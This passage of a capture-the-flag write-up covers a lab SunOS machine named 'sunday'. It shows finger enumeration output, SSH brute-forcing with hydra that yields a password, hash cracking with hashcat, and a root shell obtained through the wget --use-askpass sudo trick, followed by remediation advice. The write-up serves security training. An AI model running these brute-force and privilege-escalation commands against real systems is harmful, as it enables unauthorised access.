777777@10.10.10.76: Login Name TTY Idle When Where..pkg5srv pkg(7) server UID < . . . . >..
sammy@10.10.10.76: sammy ??? ssh <Apr 13, 2022> 10.10.14.13 ..
741852963@10.10.10.76: Login Name TTY Idle When Where..pkg5srv pkg(7) server UID < . . . . >..
741852@10.10.10.76: Login Name TTY Idle When Where..pkg5srv pkg(7) server UID < . . . . >..
753951@10.10.10.76: Login Name TTY Idle When Where..pkg5srv pkg(7) server UID < . . . . >..
7654321@10.10.10.76: Login Name TTY Idle When Where..pkg5srv pkg(7) server UID < . . . . >..
77777@10.10.10.76: Login Name TTY Idle When Where..pkg5srv pkg(7) server UID < . . . . >..
rock you@10.10.10.76: Login Name TTY Idle When Where..rock ???..you ???..
789789@10.10.10.76: Login Name TTY Idle When Where..pkg5srv pkg(7) server UID < . . . . >..
778899@10.10.10.76: Login Name TTY Idle When Where..pkg5srv pkg(7) server UID < . . . . >..
sunny@10.10.10.76: sunny ??? ssh <Apr 13, 2022> 10.10.14.13 ..
7894561230@10.10.10.76: Login Name TTY Idle When Where..pkg5srv pkg(7) server UID < . . . . >..
i love you@10.10.10.76: Login Name TTY Idle When Where..i ???..love ???..you ???..
unknown@10.10.10.76: unknown Unknown Remote UID < . . . . >..
753159@10.10.10.76: Login Name TTY Idle When Where..pkg5srv pkg(7) server UID < . . . . >..
789123@10.10.10.76: Login Name TTY Idle When Where..pkg5srv pkg(7) server UID < . . . . >..
te amo@10.10.10.76: Login Name TTY Idle When WherFrom all of items above, there are only two unique items, sammy@10.10.10.76: sammy and sunny@10.10.10.76:sunny.
I put sammy and sunny into username.txt and run the hydra again with the rockyou wordlist for password. There might be a possibility that the password can be used for solaris too.
Result:
[DATA] attacking ssh://10.10.10.76:22022/
[22022][ssh] host: 10.10.10.76 login: sunny password: sundayThe password is surprisingly simple.
Command: ssh sunny@10.10.10.76 -p 22022
Lateral Movement (?)
User.txt inside sammy. I might have to login to sammy in order to get into root. Searching for root privileged file that can be executed by sunny.
Command: find / -perm -u=s -type f 2>/dev/null
Result:
/usr/lib/ssh/ssh-keysign
/usr/lib/inet/mailq
/usr/lib/acct/accton
/usr/lib/fs/ufs/ufsrestore
/usr/lib/fs/ufs/ufsdump
/usr/lib/fs/smbfs/umount
/usr/lib/fs/smbfs/mount
/usr/lib/vmware-tools/bin/i86/vmware-user-suid-wrapper
/usr/lib/utmp_update
/usr/bin/uptime
/usr/bin/atrm
/usr/bin/passwd
/usr/bin/rcp
/usr/bin/chkey
/usr/bin/rmformat
/usr/bin/pfedit
/usr/bin/atq
/usr/bin/w
/usr/bin/cdrw
/usr/bin/crontab
/usr/bin/sys-suspend
/usr/bin/rlogin
/usr/bin/newgrp
/usr/bin/at
/usr/bin/su
/usr/bin/newtask
/usr/bin/sudo
/usr/bin/rsh
/usr/xpg4/bin/crontab
/usr/xpg4/bin/at
/usr/xpg6/bin/crontab
/usr/sbin/quota
/usr/sbin/fmdump
/usr/sbin/ping
/usr/sbin/traceroute
/usr/sbin/smbadm
/usr/sbin/whodoSearching for what sunny can run using sudo that can be executed by sunny.
Command: sudo -l
Result:
User sunny may run the following commands on sunday:
(root) NOPASSWD: /root/troll
Command: sudo /root/troll
Result:
testing
uid=0(root) gid=0(root)
Command: uname -a
Result:
SunOS sunday 5.11 11.4.0.15.0 i86pc i386 i86pcTransfer from pspy32 to SunOS and got the process killed after run it. Then I use linpeas but got this error of illegal option from grep.
After enumerating for a while, I found /backup directory in the machine.
I try to crack it with hashcat. $5$ is a prefix to identify sha256-crypt hashes.
Command: hashcat -m 7400 creds.txt /usr/share/wordlists/rockyou.txt
To show the result, use --show
Command: hashcat -m 7400 creds.txt /usr/share/wordlists/rockyou.txt --show
Result:
$5$Ebkn8jlK$i6SSPa0.u7Gd.0oJOT4T421N2OvsfXqAT1vCoYUOigB:cooldude!
Privilege Escalation
I do enumeration using commands.
Command: sudo -l
Result:
User sammy may run the following commands on sunday:
(ALL) ALL
(root) NOPASSWD: /usr/bin/wgetSearching in gtfobins and find wget privesc method.
Commands:
TF=$(mktemp) => makes "pointer" to the executed command inside parentheses
chmod +x $TF => make it executable
echo -e '#!/bin/sh\n/bin/sh 1>&0' >$TF => input the string to temp file, which means stdin>&stdout where stdin attached into stdout so it can receive input (CMIIW)
sudo wget --use-askpass=$TF 0 => to specify the command that wget use if askpass is (when using sudo, the wget might ask password and execute the $TF)used
Summary
There are several vulnerabilities here such as:
- Weak credentials (password for sunny and crackable for sammy).
- Opened port that can be accessed (finger, printer, etc).
- Weak file permission.
Remediation that I might suggest is:
- Use stronger credentials.
- Close unnecessary ports.
- Implement least privilege principle, especially file’s permission.
What didn’t work for me is:
- Using CVE to privesc.
- Injection in login site.
- Searching and using exploit from searchsploit, exploitdb, etc based on version.
- Directory busting.
- Pspy and linpeas.
What can I improve is:
- Exploring other services/ports.
- There might be several ways to privesc.
What I learnt from this box is:
- Brute force might work because there are many person using common credentials (even when someone said that if you brute forcing, then there are missing information)
- Finger enumeration using finger-user-enum.pl resulting in logged on user and showing username.
There are possibilities that this machine have several vulnerabilities even ways for privesc. Please let me know if there are any recommendation, critics, or something that I might miss in this box. That’s all folks. Thanks for reading.
